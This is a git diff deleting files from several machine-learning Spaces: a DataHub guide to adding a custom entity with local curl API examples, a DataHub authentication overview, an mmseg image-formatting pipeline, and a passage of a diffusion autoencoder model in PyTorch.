Key for a Service - */ -@Aspect = { - "name": "serviceKey" -} -record ServiceKey { - /** - * Name of the service - */ - @Searchable = { - "fieldType": "TEXT_PARTIAL", - "enableAutocomplete": true - } - name: string -} -``` - -ServiceInfo.pdl - -``` -namespace com.linkedin.service - -import com.linkedin.common.Urn - -/** - * Properties associated with a Tag - */ -@Aspect = { - "name": "serviceInfo" -} -record ServiceInfo { - - /** - * Description of the service - */ - @Searchable = {} - description: string - - /** - * The owners of the - */ - @Relationship = { - "name": "OwnedBy", - "entityTypes": ["corpUser"] - } - owner: Urn -} -``` - -#### Step 2. Add aspect union. - -ServiceAspect.pdl - -``` -namespace com.linkedin.metadata.aspect - -import com.linkedin.metadata.key.ServiceKey -import com.linkedin.service.ServiceInfo -import com.linkedin.common.BrowsePaths - -/** - * Service Info - */ -typeref ServiceAspect = union[ - ServiceKey, - ServiceInfo, - BrowsePaths -] -``` - -#### Step 3. Add Snapshot model. - -ServiceSnapshot.pdl - -``` -namespace com.linkedin.metadata.snapshot - -import com.linkedin.common.Urn -import com.linkedin.metadata.aspect.ServiceAspect - -@Entity = { - "name": "service", - "keyAspect": "serviceKey" -} -record ServiceSnapshot { - - /** - * Urn for the service - */ - urn: Urn - - /** - * The list of service aspects - */ - aspects: array[ServiceAspect] -} -``` - -#### Step 4. Update Snapshot union. - -Snapshot.pdl - -``` -namespace com.linkedin.metadata.snapshot - -/** - * A union of all supported metadata snapshot types. - */ -typeref Snapshot = union[ - ... - ServiceSnapshot -] -``` - -### Interacting with New Entity - -1. Write Entity - -``` -curl 'http://localhost:8080/entities?action=ingest' -X POST -H 'X-RestLi-Protocol-Version:2.0.0' --data '{ - "entity":{ - "value":{ - "com.linkedin.metadata.snapshot.ServiceSnapshot":{ - "urn": "urn:li:service:mydemoservice", - "aspects":[ - { - "com.linkedin.service.ServiceInfo":{ - "description":"My demo service", - "owner": "urn:li:corpuser:user1" - } - }, - { - "com.linkedin.common.BrowsePaths":{ - "paths":[ - "/my/custom/browse/path1", - "/my/custom/browse/path2" - ] - } - } - ] - } - } - } -}' -``` - -2. Read Entity - -``` -curl 'http://localhost:8080/entities/urn%3Ali%3Aservice%3Amydemoservice' -H 'X-RestLi-Protocol-Version:2.0.0' -``` - -3. Search Entity - -``` -curl --location --request POST 'http://localhost:8080/entities?action=search' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' \ ---header 'Content-Type: application/json' \ ---data-raw '{ - "input": "My demo", - "entity": "service", - "start": 0, - "count": 10 -}' -``` - -4. Autocomplete - -``` -curl --location --request POST 'http://localhost:8080/entities?action=autocomplete' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' \ ---header 'Content-Type: application/json' \ ---data-raw '{ - "query": "mydem", - "entity": "service", - "limit": 10 -}' -``` - -5. Browse - -``` -curl --location --request POST 'http://localhost:8080/entities?action=browse' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' \ ---header 'Content-Type: application/json' \ ---data-raw '{ - "path": "/my/custom/browse", - "entity": "service", - "start": 0, - "limit": 10 -}' -``` - -6. Relationships - -``` -curl --location --request GET 'http://localhost:8080/relationships?direction=INCOMING&urn=urn%3Ali%3Acorpuser%3Auser1&types=OwnedBy' \ ---header 'X-RestLi-Protocol-Version: 2.0.0' -``` - diff --git a/spaces/abdvl/datahub_qa_bot/docs/authentication/README.md b/spaces/abdvl/datahub_qa_bot/docs/authentication/README.md deleted file mode 100644 index 4034cb15cfd22b5485794f51b71b04a0fff9d5f6..0000000000000000000000000000000000000000 --- a/spaces/abdvl/datahub_qa_bot/docs/authentication/README.md +++ /dev/null @@ -1,55 +0,0 @@ -# Overview - -Authentication is the process of verifying the identity of a user or service. There are two -places where Authentication occurs inside DataHub: - -1. DataHub frontend service when a user attempts to log in to the DataHub application. -2. DataHub backend service when making API requests to DataHub. - -In this document, we'll tak a closer look at both. - -### Authentication in the Frontend - -Authentication of normal users of DataHub takes place in two phases. - -At login time, authentication is performed by either DataHub itself (via username / password entry) or a third-party Identity Provider. Once the identity -of the user has been established, and credentials validated, a persistent session token is generated for the user and stored -in a browser-side session cookie. - -DataHub provides 3 mechanisms for authentication at login time: - -- **Native Authentication** which uses username and password combinations natively stored and managed by DataHub, with users invited via an invite link. -- [Single Sign-On with OpenID Connect](guides/sso/configure-oidc-react.md) to delegate authentication responsibility to third party systems like Okta or Google/Azure Authentication. This is the recommended approach for production systems. -- [JaaS Authentication](guides/jaas.md) for simple deployments where authenticated users are part of some known list or invited as a [Native DataHub User](guides/add-users.md). - -In subsequent requests, the session token is used to represent the authenticated identity of the user, and is validated by DataHub's backend service (discussed below). -Eventually, the session token is expired (24 hours by default), at which point the end user is required to log in again. - -### Authentication in the Backend (Metadata Service) - -When a user makes a request for Data within DataHub, the request is authenticated by DataHub's Backend (Metadata Service) via a JSON Web Token. This applies to both requests originating from the DataHub application, -and programmatic calls to DataHub APIs. There are two types of tokens that are important: - -1. **Session Tokens**: Generated for users of the DataHub web application. By default, having a duration of 24 hours. -These tokens are encoded and stored inside browser-side session cookies. -2. **Personal Access Tokens**: These are tokens generated via the DataHub settings panel useful for interacting -with DataHub APIs. They can be used to automate processes like enriching documentation, ownership, tags, and more on DataHub. Learn -more about Personal Access Tokens [here](personal-access-tokens.md). - -To learn more about DataHub's backend authentication, check out [Introducing Metadata Service Authentication](introducing-metadata-service-authentication.md). - -Credentials must be provided as Bearer Tokens inside of the **Authorization** header in any request made to DataHub's API layer. To learn - -```shell -Authorization: Bearer -``` - -Note that in DataHub local quickstarts, Authentication at the backend layer is disabled for convenience. This leaves the backend -vulnerable to unauthenticated requests and should not be used in production. To enable -backend (token-based) authentication, simply set the `METADATA_SERVICE_AUTH_ENABLED=true` environment variable -for the datahub-gms container or pod. - -### References - -For a quick video on the topic of users and groups within DataHub, have a look at [DataHub Basics — Users, Groups, & Authentication 101 -](https://youtu.be/8Osw6p9vDYY) \ No newline at end of file diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/datasets/pipelines/formating.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/datasets/pipelines/formating.py deleted file mode 100644 index 97db85f4f9db39fb86ba77ead7d1a8407d810adb..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmseg/datasets/pipelines/formating.py +++ /dev/null @@ -1,288 +0,0 @@ -from collections.abc import Sequence - -import annotator.uniformer.mmcv as mmcv -import numpy as np -import torch -from annotator.uniformer.mmcv.parallel import DataContainer as DC - -from ..builder import PIPELINES - - -def to_tensor(data): - """Convert objects of various python types to :obj:`torch.Tensor`. - - Supported types are: :class:`numpy.ndarray`, :class:`torch.Tensor`, - :class:`Sequence`, :class:`int` and :class:`float`. - - Args: - data (torch.Tensor | numpy.ndarray | Sequence | int | float): Data to - be converted. - """ - - if isinstance(data, torch.Tensor): - return data - elif isinstance(data, np.ndarray): - return torch.from_numpy(data) - elif isinstance(data, Sequence) and not mmcv.is_str(data): - return torch.tensor(data) - elif isinstance(data, int): - return torch.LongTensor([data]) - elif isinstance(data, float): - return torch.FloatTensor([data]) - else: - raise TypeError(f'type {type(data)} cannot be converted to tensor.') - - -@PIPELINES.register_module() -class ToTensor(object): - """Convert some results to :obj:`torch.Tensor` by given keys. - - Args: - keys (Sequence[str]): Keys that need to be converted to Tensor. - """ - - def __init__(self, keys): - self.keys = keys - - def __call__(self, results): - """Call function to convert data in results to :obj:`torch.Tensor`. - - Args: - results (dict): Result dict contains the data to convert. - - Returns: - dict: The result dict contains the data converted - to :obj:`torch.Tensor`. - """ - - for key in self.keys: - results[key] = to_tensor(results[key]) - return results - - def __repr__(self): - return self.__class__.__name__ + f'(keys={self.keys})' - - -@PIPELINES.register_module() -class ImageToTensor(object): - """Convert image to :obj:`torch.Tensor` by given keys. - - The dimension order of input image is (H, W, C). The pipeline will convert - it to (C, H, W). If only 2 dimension (H, W) is given, the output would be - (1, H, W). - - Args: - keys (Sequence[str]): Key of images to be converted to Tensor. - """ - - def __init__(self, keys): - self.keys = keys - - def __call__(self, results): - """Call function to convert image in results to :obj:`torch.Tensor` and - transpose the channel order. - - Args: - results (dict): Result dict contains the image data to convert. - - Returns: - dict: The result dict contains the image converted - to :obj:`torch.Tensor` and transposed to (C, H, W) order. - """ - - for key in self.keys: - img = results[key] - if len(img.shape) < 3: - img = np.expand_dims(img, -1) - results[key] = to_tensor(img.transpose(2, 0, 1)) - return results - - def __repr__(self): - return self.__class__.__name__ + f'(keys={self.keys})' - - -@PIPELINES.register_module() -class Transpose(object): - """Transpose some results by given keys. - - Args: - keys (Sequence[str]): Keys of results to be transposed. - order (Sequence[int]): Order of transpose. - """ - - def __init__(self, keys, order): - self.keys = keys - self.order = order - - def __call__(self, results): - """Call function to convert image in results to :obj:`torch.Tensor` and - transpose the channel order. - - Args: - results (dict): Result dict contains the image data to convert. - - Returns: - dict: The result dict contains the image converted - to :obj:`torch.Tensor` and transposed to (C, H, W) order. - """ - - for key in self.keys: - results[key] = results[key].transpose(self.order) - return results - - def __repr__(self): - return self.__class__.__name__ + \ - f'(keys={self.keys}, order={self.order})' - - -@PIPELINES.register_module() -class ToDataContainer(object): - """Convert results to :obj:`mmcv.DataContainer` by given fields. - - Args: - fields (Sequence[dict]): Each field is a dict like - ``dict(key='xxx', **kwargs)``. The ``key`` in result will - be converted to :obj:`mmcv.DataContainer` with ``**kwargs``. - Default: ``(dict(key='img', stack=True), - dict(key='gt_semantic_seg'))``. - """ - - def __init__(self, - fields=(dict(key='img', - stack=True), dict(key='gt_semantic_seg'))): - self.fields = fields - - def __call__(self, results): - """Call function to convert data in results to - :obj:`mmcv.DataContainer`. - - Args: - results (dict): Result dict contains the data to convert. - - Returns: - dict: The result dict contains the data converted to - :obj:`mmcv.DataContainer`. - """ - - for field in self.fields: - field = field.copy() - key = field.pop('key') - results[key] = DC(results[key], **field) - return results - - def __repr__(self): - return self.__class__.__name__ + f'(fields={self.fields})' - - -@PIPELINES.register_module() -class DefaultFormatBundle(object): - """Default formatting bundle. - - It simplifies the pipeline of formatting common fields, including "img" - and "gt_semantic_seg". These fields are formatted as follows. - - - img: (1)transpose, (2)to tensor, (3)to DataContainer (stack=True) - - gt_semantic_seg: (1)unsqueeze dim-0 (2)to tensor, - (3)to DataContainer (stack=True) - """ - - def __call__(self, results): - """Call function to transform and format common fields in results. - - Args: - results (dict): Result dict contains the data to convert. - - Returns: - dict: The result dict contains the data that is formatted with - default bundle. - """ - - if 'img' in results: - img = results['img'] - if len(img.shape) < 3: - img = np.expand_dims(img, -1) - img = np.ascontiguousarray(img.transpose(2, 0, 1)) - results['img'] = DC(to_tensor(img), stack=True) - if 'gt_semantic_seg' in results: - # convert to long - results['gt_semantic_seg'] = DC( - to_tensor(results['gt_semantic_seg'][None, - ...].astype(np.int64)), - stack=True) - return results - - def __repr__(self): - return self.__class__.__name__ - - -@PIPELINES.register_module() -class Collect(object): - """Collect data from the loader relevant to the specific task. - - This is usually the last stage of the data loader pipeline. Typically keys - is set to some subset of "img", "gt_semantic_seg". - - The "img_meta" item is always populated. The contents of the "img_meta" - dictionary depends on "meta_keys". By default this includes: - - - "img_shape": shape of the image input to the network as a tuple - (h, w, c). Note that images may be zero padded on the bottom/right - if the batch tensor is larger than this shape. - - - "scale_factor": a float indicating the preprocessing scale - - - "flip": a boolean indicating if image flip transform was used - - - "filename": path to the image file - - - "ori_shape": original shape of the image as a tuple (h, w, c) - - - "pad_shape": image shape after padding - - - "img_norm_cfg": a dict of normalization information: - - mean - per channel mean subtraction - - std - per channel std divisor - - to_rgb - bool indicating if bgr was converted to rgb - - Args: - keys (Sequence[str]): Keys of results to be collected in ``data``. - meta_keys (Sequence[str], optional): Meta keys to be converted to - ``mmcv.DataContainer`` and collected in ``data[img_metas]``. - Default: ``('filename', 'ori_filename', 'ori_shape', 'img_shape', - 'pad_shape', 'scale_factor', 'flip', 'flip_direction', - 'img_norm_cfg')`` - """ - - def __init__(self, - keys, - meta_keys=('filename', 'ori_filename', 'ori_shape', - 'img_shape', 'pad_shape', 'scale_factor', 'flip', - 'flip_direction', 'img_norm_cfg')): - self.keys = keys - self.meta_keys = meta_keys - - def __call__(self, results): - """Call function to collect keys in results. The keys in ``meta_keys`` - will be converted to :obj:mmcv.DataContainer. - - Args: - results (dict): Result dict contains the data to collect. - - Returns: - dict: The result dict contains the following keys - - keys in``self.keys`` - - ``img_metas`` - """ - - data = {} - img_meta = {} - for key in self.meta_keys: - img_meta[key] = results[key] - data['img_metas'] = DC(img_meta, cpu_only=True) - for key in self.keys: - data[key] = results[key] - return data - - def __repr__(self): - return self.__class__.__name__ + \ - f'(keys={self.keys}, meta_keys={self.meta_keys})' diff --git a/spaces/abhishek/sketch-to-image/lib/model.py b/spaces/abhishek/sketch-to-image/lib/model.py deleted file mode 100644 index fa2b4c5082211b91023df971fd02560fac452ec6..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/lib/model.py +++ /dev/null @@ -1,862 +0,0 @@ -''' - * Copyright (c) 2023 Salesforce, Inc. - * All rights reserved. - * SPDX-License-Identifier: Apache License 2.0 - * For full license text, see LICENSE.txt file in the repo root or http://www.apache.org/licenses/ - * By Can Qin - * Modified from ControlNet repo: https://github.com/lllyasviel/ControlNet - * Copyright (c) 2023 Lvmin Zhang and Maneesh Agrawala -''' - -# pytorch_diffusion + derived encoder decoder -import math -import torch -import torch.nn as nn -import numpy as np -from einops import rearrange -from typing import Optional, Any - -from lib.attention import MemoryEfficientCrossAttention - -try: - import xformers - import xformers.ops - XFORMERS_IS_AVAILBLE = True -except: - XFORMERS_IS_AVAILBLE = False - print("No module 'xformers'. Proceeding without it.") - - -def get_timestep_embedding(timesteps, embedding_dim): - """ - This matches the implementation in Denoising Diffusion Probabilistic Models: - From Fairseq. - Build sinusoidal embeddings. - This matches the implementation in tensor2tensor, but differs slightly - from the description in Section 3.5 of "Attention Is All You Need". - """ - assert len(timesteps.shape) == 1 - - half_dim = embedding_dim // 2 - emb = math.log(10000) / (half_dim - 1) - emb = torch.exp(torch.arange(half_dim, dtype=torch.float32) * -emb) - emb = emb.to(device=timesteps.device) - emb = timesteps.float()[:, None] * emb[None, :] - emb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1) - if embedding_dim % 2 == 1: # zero pad - emb = torch.nn.functional.pad(emb, (0,1,0,0)) - return emb - - -def nonlinearity(x): - # swish - return x*torch.sigmoid(x) - - -def Normalize(in_channels, num_groups=32): - return torch.nn.GroupNorm(num_groups=num_groups, num_channels=in_channels, eps=1e-6, affine=True) - - -class Upsample(nn.Module): - def __init__(self, in_channels, with_conv): - super().__init__() - self.with_conv = with_conv - if self.with_conv: - self.conv = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - x = torch.nn.functional.interpolate(x, scale_factor=2.0, mode="nearest") - if self.with_conv: - x = self.conv(x) - return x - - -class Downsample(nn.Module): - def __init__(self, in_channels, with_conv): - super().__init__() - self.with_conv = with_conv - if self.with_conv: - # no asymmetric padding in torch conv, must do it ourselves - self.conv = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=3, - stride=2, - padding=0) - - def forward(self, x): - if self.with_conv: - pad = (0,1,0,1) - x = torch.nn.functional.pad(x, pad, mode="constant", value=0) - x = self.conv(x) - else: - x = torch.nn.functional.avg_pool2d(x, kernel_size=2, stride=2) - return x - - -class ResnetBlock(nn.Module): - def __init__(self, *, in_channels, out_channels=None, conv_shortcut=False, - dropout, temb_channels=512): - super().__init__() - self.in_channels = in_channels - out_channels = in_channels if out_channels is None else out_channels - self.out_channels = out_channels - self.use_conv_shortcut = conv_shortcut - - self.norm1 = Normalize(in_channels) - self.conv1 = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - if temb_channels > 0: - self.temb_proj = torch.nn.Linear(temb_channels, - out_channels) - self.norm2 = Normalize(out_channels) - self.dropout = torch.nn.Dropout(dropout) - self.conv2 = torch.nn.Conv2d(out_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - if self.in_channels != self.out_channels: - if self.use_conv_shortcut: - self.conv_shortcut = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - else: - self.nin_shortcut = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=1, - stride=1, - padding=0) - - def forward(self, x, temb): - h = x - h = self.norm1(h) - h = nonlinearity(h) - h = self.conv1(h) - - if temb is not None: - h = h + self.temb_proj(nonlinearity(temb))[:,:,None,None] - - h = self.norm2(h) - h = nonlinearity(h) - h = self.dropout(h) - h = self.conv2(h) - - if self.in_channels != self.out_channels: - if self.use_conv_shortcut: - x = self.conv_shortcut(x) - else: - x = self.nin_shortcut(x) - - return x+h - - -class AttnBlock(nn.Module): - def __init__(self, in_channels): - super().__init__() - self.in_channels = in_channels - - self.norm = Normalize(in_channels) - self.q = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.k = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.v = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.proj_out = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - - def forward(self, x): - h_ = x - h_ = self.norm(h_) - q = self.q(h_) - k = self.k(h_) - v = self.v(h_) - - # compute attention - b,c,h,w = q.shape - q = q.reshape(b,c,h*w) - q = q.permute(0,2,1) # b,hw,c - k = k.reshape(b,c,h*w) # b,c,hw - w_ = torch.bmm(q,k) # b,hw,hw w[b,i,j]=sum_c q[b,i,c]k[b,c,j] - w_ = w_ * (int(c)**(-0.5)) - w_ = torch.nn.functional.softmax(w_, dim=2) - - # attend to values - v = v.reshape(b,c,h*w) - w_ = w_.permute(0,2,1) # b,hw,hw (first hw of k, second of q) - h_ = torch.bmm(v,w_) # b, c,hw (hw of q) h_[b,c,j] = sum_i v[b,c,i] w_[b,i,j] - h_ = h_.reshape(b,c,h,w) - - h_ = self.proj_out(h_) - - return x+h_ - -class MemoryEfficientAttnBlock(nn.Module): - """ - Uses xformers efficient implementation, - see https://github.com/MatthieuTPHR/diffusers/blob/d80b531ff8060ec1ea982b65a1b8df70f73aa67c/src/diffusers/models/attention.py#L223 - Note: this is a single-head self-attention operation - """ - # - def __init__(self, in_channels): - super().__init__() - self.in_channels = in_channels - - self.norm = Normalize(in_channels) - self.q = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.k = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.v = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.proj_out = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=1, - stride=1, - padding=0) - self.attention_op: Optional[Any] = None - - def forward(self, x): - h_ = x - h_ = self.norm(h_) - q = self.q(h_) - k = self.k(h_) - v = self.v(h_) - - # compute attention - B, C, H, W = q.shape - q, k, v = map(lambda x: rearrange(x, 'b c h w -> b (h w) c'), (q, k, v)) - - q, k, v = map( - lambda t: t.unsqueeze(3) - .reshape(B, t.shape[1], 1, C) - .permute(0, 2, 1, 3) - .reshape(B * 1, t.shape[1], C) - .contiguous(), - (q, k, v), - ) - out = xformers.ops.memory_efficient_attention(q, k, v, attn_bias=None, op=self.attention_op) - - out = ( - out.unsqueeze(0) - .reshape(B, 1, out.shape[1], C) - .permute(0, 2, 1, 3) - .reshape(B, out.shape[1], C) - ) - out = rearrange(out, 'b (h w) c -> b c h w', b=B, h=H, w=W, c=C) - out = self.proj_out(out) - return x+out - - -class MemoryEfficientCrossAttentionWrapper(MemoryEfficientCrossAttention): - def forward(self, x, context=None, mask=None): - b, c, h, w = x.shape - x = rearrange(x, 'b c h w -> b (h w) c') - out = super().forward(x, context=context, mask=mask) - out = rearrange(out, 'b (h w) c -> b c h w', h=h, w=w, c=c) - return x + out - - -def make_attn(in_channels, attn_type="vanilla", attn_kwargs=None): - assert attn_type in ["vanilla", "vanilla-xformers", "memory-efficient-cross-attn", "linear", "none"], f'attn_type {attn_type} unknown' - if XFORMERS_IS_AVAILBLE and attn_type == "vanilla": - attn_type = "vanilla-xformers" - print(f"making attention of type '{attn_type}' with {in_channels} in_channels") - if attn_type == "vanilla": - assert attn_kwargs is None - return AttnBlock(in_channels) - elif attn_type == "vanilla-xformers": - print(f"building MemoryEfficientAttnBlock with {in_channels} in_channels...") - return MemoryEfficientAttnBlock(in_channels) - elif type == "memory-efficient-cross-attn": - attn_kwargs["query_dim"] = in_channels - return MemoryEfficientCrossAttentionWrapper(**attn_kwargs) - elif attn_type == "none": - return nn.Identity(in_channels) - else: - raise NotImplementedError() - - -class Model(nn.Module): - def __init__(self, *, ch, out_ch, ch_mult=(1,2,4,8), num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, in_channels, - resolution, use_timestep=True, use_linear_attn=False, attn_type="vanilla"): - super().__init__() - if use_linear_attn: attn_type = "linear" - self.ch = ch - self.temb_ch = self.ch*4 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - self.resolution = resolution - self.in_channels = in_channels - - self.use_timestep = use_timestep - if self.use_timestep: - # timestep embedding - self.temb = nn.Module() - self.temb.dense = nn.ModuleList([ - torch.nn.Linear(self.ch, - self.temb_ch), - torch.nn.Linear(self.temb_ch, - self.temb_ch), - ]) - - # downsampling - self.conv_in = torch.nn.Conv2d(in_channels, - self.ch, - kernel_size=3, - stride=1, - padding=1) - - curr_res = resolution - in_ch_mult = (1,)+tuple(ch_mult) - self.down = nn.ModuleList() - for i_level in range(self.num_resolutions): - block = nn.ModuleList() - attn = nn.ModuleList() - block_in = ch*in_ch_mult[i_level] - block_out = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks): - block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - down = nn.Module() - down.block = block - down.attn = attn - if i_level != self.num_resolutions-1: - down.downsample = Downsample(block_in, resamp_with_conv) - curr_res = curr_res // 2 - self.down.append(down) - - # middle - self.mid = nn.Module() - self.mid.block_1 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - self.mid.attn_1 = make_attn(block_in, attn_type=attn_type) - self.mid.block_2 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - - # upsampling - self.up = nn.ModuleList() - for i_level in reversed(range(self.num_resolutions)): - block = nn.ModuleList() - attn = nn.ModuleList() - block_out = ch*ch_mult[i_level] - skip_in = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks+1): - if i_block == self.num_res_blocks: - skip_in = ch*in_ch_mult[i_level] - block.append(ResnetBlock(in_channels=block_in+skip_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - up = nn.Module() - up.block = block - up.attn = attn - if i_level != 0: - up.upsample = Upsample(block_in, resamp_with_conv) - curr_res = curr_res * 2 - self.up.insert(0, up) # prepend to get consistent order - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - out_ch, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x, t=None, context=None): - #assert x.shape[2] == x.shape[3] == self.resolution - if context is not None: - # assume aligned context, cat along channel axis - x = torch.cat((x, context), dim=1) - if self.use_timestep: - # timestep embedding - assert t is not None - temb = get_timestep_embedding(t, self.ch) - temb = self.temb.dense[0](temb) - temb = nonlinearity(temb) - temb = self.temb.dense[1](temb) - else: - temb = None - - # downsampling - hs = [self.conv_in(x)] - for i_level in range(self.num_resolutions): - for i_block in range(self.num_res_blocks): - h = self.down[i_level].block[i_block](hs[-1], temb) - if len(self.down[i_level].attn) > 0: - h = self.down[i_level].attn[i_block](h) - hs.append(h) - if i_level != self.num_resolutions-1: - hs.append(self.down[i_level].downsample(hs[-1])) - - # middle - h = hs[-1] - h = self.mid.block_1(h, temb) - h = self.mid.attn_1(h) - h = self.mid.block_2(h, temb) - - # upsampling - for i_level in reversed(range(self.num_resolutions)): - for i_block in range(self.num_res_blocks+1): - h = self.up[i_level].block[i_block]( - torch.cat([h, hs.pop()], dim=1), temb) - if len(self.up[i_level].attn) > 0: - h = self.up[i_level].attn[i_block](h) - if i_level != 0: - h = self.up[i_level].upsample(h) - - # end - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - return h - - def get_last_layer(self): - return self.conv_out.weight - - -class Encoder(nn.Module): - def __init__(self, *, ch, out_ch, ch_mult=(1,2,4,8), num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, in_channels, - resolution, z_channels, double_z=True, use_linear_attn=False, attn_type="vanilla", - **ignore_kwargs): - super().__init__() - if use_linear_attn: attn_type = "linear" - self.ch = ch - self.temb_ch = 0 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - self.resolution = resolution - self.in_channels = in_channels - - # downsampling - self.conv_in = torch.nn.Conv2d(in_channels, - self.ch, - kernel_size=3, - stride=1, - padding=1) - - curr_res = resolution - in_ch_mult = (1,)+tuple(ch_mult) - self.in_ch_mult = in_ch_mult - self.down = nn.ModuleList() - for i_level in range(self.num_resolutions): - block = nn.ModuleList() - attn = nn.ModuleList() - block_in = ch*in_ch_mult[i_level] - block_out = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks): - block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - down = nn.Module() - down.block = block - down.attn = attn - if i_level != self.num_resolutions-1: - down.downsample = Downsample(block_in, resamp_with_conv) - curr_res = curr_res // 2 - self.down.append(down) - - # middle - self.mid = nn.Module() - self.mid.block_1 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - self.mid.attn_1 = make_attn(block_in, attn_type=attn_type) - self.mid.block_2 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - 2*z_channels if double_z else z_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - # timestep embedding - temb = None - - # downsampling - hs = [self.conv_in(x)] - for i_level in range(self.num_resolutions): - for i_block in range(self.num_res_blocks): - h = self.down[i_level].block[i_block](hs[-1], temb) - if len(self.down[i_level].attn) > 0: - h = self.down[i_level].attn[i_block](h) - hs.append(h) - if i_level != self.num_resolutions-1: - hs.append(self.down[i_level].downsample(hs[-1])) - - # middle - h = hs[-1] - h = self.mid.block_1(h, temb) - h = self.mid.attn_1(h) - h = self.mid.block_2(h, temb) - - # end - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - return h - - -class Decoder(nn.Module): - def __init__(self, *, ch, out_ch, ch_mult=(1,2,4,8), num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, in_channels, - resolution, z_channels, give_pre_end=False, tanh_out=False, use_linear_attn=False, - attn_type="vanilla", **ignorekwargs): - super().__init__() - if use_linear_attn: attn_type = "linear" - self.ch = ch - self.temb_ch = 0 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - self.resolution = resolution - self.in_channels = in_channels - self.give_pre_end = give_pre_end - self.tanh_out = tanh_out - - # compute in_ch_mult, block_in and curr_res at lowest res - in_ch_mult = (1,)+tuple(ch_mult) - block_in = ch*ch_mult[self.num_resolutions-1] - curr_res = resolution // 2**(self.num_resolutions-1) - self.z_shape = (1,z_channels,curr_res,curr_res) - print("Working with z of shape {} = {} dimensions.".format( - self.z_shape, np.prod(self.z_shape))) - - # z to block_in - self.conv_in = torch.nn.Conv2d(z_channels, - block_in, - kernel_size=3, - stride=1, - padding=1) - - # middle - self.mid = nn.Module() - self.mid.block_1 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - self.mid.attn_1 = make_attn(block_in, attn_type=attn_type) - self.mid.block_2 = ResnetBlock(in_channels=block_in, - out_channels=block_in, - temb_channels=self.temb_ch, - dropout=dropout) - - # upsampling - self.up = nn.ModuleList() - for i_level in reversed(range(self.num_resolutions)): - block = nn.ModuleList() - attn = nn.ModuleList() - block_out = ch*ch_mult[i_level] - for i_block in range(self.num_res_blocks+1): - block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - if curr_res in attn_resolutions: - attn.append(make_attn(block_in, attn_type=attn_type)) - up = nn.Module() - up.block = block - up.attn = attn - if i_level != 0: - up.upsample = Upsample(block_in, resamp_with_conv) - curr_res = curr_res * 2 - self.up.insert(0, up) # prepend to get consistent order - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - out_ch, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, z): - #assert z.shape[1:] == self.z_shape[1:] - self.last_z_shape = z.shape - - # timestep embedding - temb = None - - # z to block_in - h = self.conv_in(z) - - # middle - h = self.mid.block_1(h, temb) - h = self.mid.attn_1(h) - h = self.mid.block_2(h, temb) - - # upsampling - for i_level in reversed(range(self.num_resolutions)): - for i_block in range(self.num_res_blocks+1): - h = self.up[i_level].block[i_block](h, temb) - if len(self.up[i_level].attn) > 0: - h = 